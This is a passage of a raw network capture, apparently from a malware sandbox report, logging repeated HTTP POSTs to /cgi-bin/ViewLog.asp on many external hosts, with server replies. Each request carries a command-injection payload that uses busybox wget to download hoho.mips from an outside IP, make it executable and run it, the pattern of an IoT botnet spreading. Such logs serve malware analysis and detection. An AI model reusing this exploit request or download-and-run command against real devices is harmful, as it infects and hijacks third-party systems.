                                              Nov 23, 2023 05:18:19.046175003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              721192.168.2.134719894.152.208.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.715907097 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.979404926 CET525INHTTP/1.1 401
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              X-Frame-Options: DENY
                                              Content-Type: application/json;charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Date: Thu, 23 Nov 2023 04:18:09 GMT
                                              Data Raw: 38 66 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 33 2d 31 31 2d 32 33 54 30 34 3a 31 38 3a 30 39 2e 38 37 32 2b 30 30 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 31 2c 22 65 72 72 6f 72 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 6d 65 73 73 61 67 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                              Data Ascii: 8f{"timestamp":"2023-11-23T04:18:09.872+0000","status":401,"error":"Unauthorized","message":"No message available","path":"/cgi-bin/ViewLog.asp"}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              722192.168.2.135416694.121.26.738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.722306013 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              723192.168.2.134186231.200.40.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.740240097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              724192.168.2.133930485.69.32.2018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.869381905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.438170910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.558172941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.926167011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.534302950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              725192.168.2.134758494.121.188.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.939802885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              726192.168.2.134228294.120.147.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.954325914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              727192.168.2.135989431.200.205.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.971290112 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.223901987 CET90INHTTP/1.1 403 Forbidden


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              728192.168.2.134130094.249.234.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.698942900 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.686217070 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.877003908 CET433INHTTP/1.0 302 Redirect
                                              Date: Thu, 23 Nov 2023 04:18:11 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html
                                              Location: /index.html
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 09 09 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 74 6f 20 61 20 6e 65 77 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 28 6e 75 6c 6c 29 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 6c 6f 63 61 74 69 6f 6e 3c 2f 61 3e 2e 0d 0a 09 09 50 6c 65 61 73 65 20 75 70 64 61 74 65 20 79 6f 75 72 20 64 6f 63 75 6d 65 6e 74 73 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 6e 65 77 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 09 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head></head><body>This document has moved to a new <a href="http://(null)/index.html">location</a>.Please update your documents to reflect the new location.</body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              729192.168.2.133970294.122.127.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.725169897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              730192.168.2.135347262.202.153.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.148696899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              731192.168.2.133455494.28.171.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.179059029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.412029028 CET83INHTTP/1.1 400 Page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              732192.168.2.136043062.29.77.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.184588909 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              733192.168.2.135257295.237.11.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.285845995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.507627010 CET552INHTTP/1.1 401 Unauthorized
                                              WWW-Authenticate: Basic realm="Protected"
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>
                                              Nov 23, 2023 05:18:12.507457972 CET552INHTTP/1.1 401 Unauthorized
                                              WWW-Authenticate: Basic realm="Protected"
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              734192.168.2.135634862.29.28.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.304286957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
